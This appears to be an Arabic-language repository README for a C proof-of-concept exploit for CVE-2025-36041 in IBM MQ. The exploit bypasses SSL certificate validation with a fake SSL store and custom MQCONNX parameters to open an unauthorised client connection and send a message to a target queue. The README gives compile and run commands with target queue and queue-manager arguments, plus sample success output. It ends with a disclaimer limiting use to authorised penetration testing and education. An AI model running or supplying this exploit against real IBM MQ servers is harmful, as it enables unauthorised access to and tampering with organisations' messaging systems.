
استغلال (C) لثغرة CVE-2025-36041 في IBM MQ
يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال CVE-2025-36041، وهي ثغرة أمنية في IBM MQ (قائمة انتظار الرسائل) تسمح بتجاوز التحقق من صحة شهادة SSL. عن طريق حقن شهادة SSL مزيفة واستخدام معاملات MQCONNX مخصصة، يمكن إنشاء اتصال عميل غير مصرح به بخادم IBM MQ.
"Hello MQ") لتأكيد نجاح الاستغلال.تأكد من تثبيت مكتبات عميل IBM MQ وضبط متغيرات البيئة (MQ_INCLUDE_PATH, MQ_LIB_PATH) وفقًا لذلك.
gcc exploit.c argparse.c -o CVE-2025-36041
-I/path/to/mqm/include
-L/path/to/mqm/lib -lmqm
./CVE-2025-36041
-p /path/to/fake/ssl
-n TARGET.QUEUE.NAME
-m QM1
المعاملات:
-p, --path المسار إلى دليل مخزن SSL المزيف.-n, --name اسم قائمة الانتظار المستهدفة لفتحها وإرسال الرسالة.-m, --qmgr اسم مدير قوائم الانتظار../CVE-2025-36041 -p ./fake_ssl_repo -n MY.QUEUE -m QM1
إذا نجحت، سترى:
[+] Starting connection to IBM MQ... [+] Connected successfully with fake SSL! [+] Message sent successfully!
للاستخدام المصرح به في اختبار الاختراق والأغراض التعليمية فقط. قد يؤدي الاستخدام غير المصرح به لإثبات المفهوم هذا إلى انتهاك القوانين واللوائح المحلية. لا يتحمل المؤلف أي مسؤولية عن سوء الاستخدام.
المؤلف: Byte Reaper CVE: CVE-2025-36041